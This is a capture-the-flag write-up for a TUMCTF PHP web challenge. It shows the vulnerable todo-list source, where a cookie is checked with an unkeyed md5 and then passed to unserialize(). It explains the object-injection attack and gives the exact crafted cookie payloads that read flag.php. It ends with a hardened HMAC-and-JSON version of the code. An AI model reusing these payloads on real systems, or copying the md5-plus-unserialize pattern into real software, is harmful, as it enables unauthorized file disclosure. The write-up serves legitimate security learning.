web / free_as_in_bavarian_beer (TUMCTF)

The 2-day pentest #dientaphcm.vn finished with no highlight. My brain feels very tired, so in this TUMCTF I only tried one challenge in the Web category.

Main: http://104.154.70.126:10888/index.php

A basic POST form, and a basic XSS:

(screenshot: writeup1)

But it seems impossible to get the flag from this bug ^.^ because the hint says "flag is in flag.php", and so we certainly need to read the source code of flag.php.

Something is available on this site:

http://104.154.70.126:10888/?source

<? // something spam in license.txt ?>

<?php

class GPLSourceBloater{
    // magic method: runs whenever the object is used as a string (echo, <?= ... ?>, string concatenation)
    public function __toString()
    {
        return highlight_file('license.txt', true).highlight_file($this->source, true);
    }
}

if(isset($_GET['source'])){
    $s = new GPLSourceBloater();
    $s->source = __FILE__;

    echo $s;
    exit;
}

$todos = [];

if(isset($_COOKIE['todos'])){
    $c = $_COOKIE['todos'];
    $h = substr($c, 0, 32);
    $m = substr($c, 32);

    // "integrity" check: an unkeyed md5 that the client can compute itself
    if(md5($m) === $h){
        // cookie data reaches unserialize(): PHP object injection
        $todos = unserialize($m);
    }
}

if(isset($_POST['text'])){
    $todo = $_POST['text'];

    $todos[] = $todo;
    $m = serialize($todos);
    $h = md5($m);

    setcookie('todos', $h.$m);

    header('Location: '.$_SERVER['REQUEST_URI']);
    exit;
}

?>
<html>
<head>
<style>
* {font-family: "Comic Sans MS", cursive, sans-serif}
</style>
</head>

<h1>My open/libre/free/PHP/Linux/systemd/GNU TODO List</h1>
<a href="?source"><h2>It's super secure, see for yourself</h2></a>
<ul>
<?php foreach($todos as $todo):?>
<li><?=$todo?></li>
<?php endforeach;?>
</ul>

<form method="post" href=".">
<textarea name="text"></textarea>
<input type="submit" value="store">
</form>

I tried to read the source in spite of being tired.

Something happened in my brain:

What is "<? //something spam in license.txt ?>" used for? Does this help us read the source? 😀

So "class GPLSourceBloater" does!!!

I tried Google and found http://php.net/manual/en/language.oop5.magic.php

Magic methods are called automatically by PHP once an object exists (here, __toString runs whenever the object is used as a string, e.g. by echo).

The idea in this case is to construct a GPLSourceBloater object.

And object injection helps us do this.

After a POST I get a cookie built like setcookie('todos', md5($m).$m); # $m is the serialized todo array.

To understand the payload below you must have the serialize function in mind:

http://php.net/manual/en/function.serialize.php

To construct a GPLSourceBloater object, I design the cookie like a serialized object,

and it must have a 'this->source="flag.php"' element.

"todos=dc3d729712b1c4f52083accc39148791O%3A16%3A%22GPLSourceBloater%22%3A1%3A%7Bs%3A6%3A%22source%22%3Bs%3A8%3A%22flag.php%22%3B%7D"

But it prints:

(screenshot: writeup3)

Yup, it must be an array containing the object to print this source: the template does foreach($todos as $todo) and echoes each $todo, so the object has to be an array element for <?=$todo?> to turn it into a string and trigger __toString.

"todos=dd0216616f68a33acd7e3817e02fd4d5a%3A1%3A%7Bi%3A1%3BO%3A16%3A%22GPLSourceBloater%22%3A1%3A%7Bs%3A6%3A%22source%22%3Bs%3A8%3A%22flag.php%22%3B%7D%7D"

And I get the flag:

(screenshot: writeup2)
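As an added example (my own code, not the challenge's), here is the cookie handling the way a defender would write it: an HMAC keyed with a server-side secret instead of md5($m), a JSON payload instead of serialize(), and output escaping for the XSS from the first screenshot. TODO_COOKIE_SECRET and the function names are assumptions.

```php
<?php
// Added example, not the challenge's code: a hardened version of the todos cookie.
// - integrity tag is an HMAC keyed with a server-side secret, so a client cannot
//   recompute it the way md5($m) allowed; tags are compared with hash_equals()
// - payload is JSON, so decoding never instantiates a class or runs a magic method
// TODO_COOKIE_SECRET is a placeholder; load a real random secret from the environment.
const TODO_COOKIE_SECRET = 'replace-with-32-random-bytes';
const TAG_LEN = 64; // hex length of a SHA-256 HMAC

function encodeTodos(array $todos): string
{
    $m = json_encode(array_values($todos));
    return hash_hmac('sha256', $m, TODO_COOKIE_SECRET) . $m;
}

function decodeTodos(?string $cookie): array
{
    if ($cookie === null || strlen($cookie) <= TAG_LEN) {
        return [];
    }
    $h = substr($cookie, 0, TAG_LEN);
    $m = substr($cookie, TAG_LEN);
    if (!hash_equals(hash_hmac('sha256', $m, TODO_COOKIE_SECRET), $h)) {
        return []; // forged or corrupted cookie: ignore it, never unserialize() it
    }
    $todos = json_decode($m, true); // assoc=true: arrays only, never objects
    if (!is_array($todos)) {
        return [];
    }
    // keep only plain strings so the template is never handed anything else
    return array_values(array_filter($todos, 'is_string'));
}

// the challenge template echoes each $todo unescaped (the "basic XSS"); escape on output
function renderTodos(array $todos): string
{
    $out = '';
    foreach ($todos as $todo) {
        $out .= '<li>' . htmlspecialchars($todo, ENT_QUOTES, 'UTF-8') . "</li>\n";
    }
    return $out;
}

// demonstration on constructed input
$cookie = encodeTodos(['buy milk', '<script>alert(1)</script>']);
echo renderTodos(decodeTodos($cookie));   // two <li> entries, the second one escaped
// keep the valid tag but swap in a different payload: the HMAC no longer matches
$tampered = substr($cookie, 0, TAG_LEN) . '["injected"]';
var_dump(decodeTodos($tampered));          // array(0) {}
```

In the real page flow, encodeTodos() produces the value passed to setcookie() and decodeTodos($_COOKIE['todos'] ?? null) replaces the md5/unserialize block.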

Done!! Good night reader!!
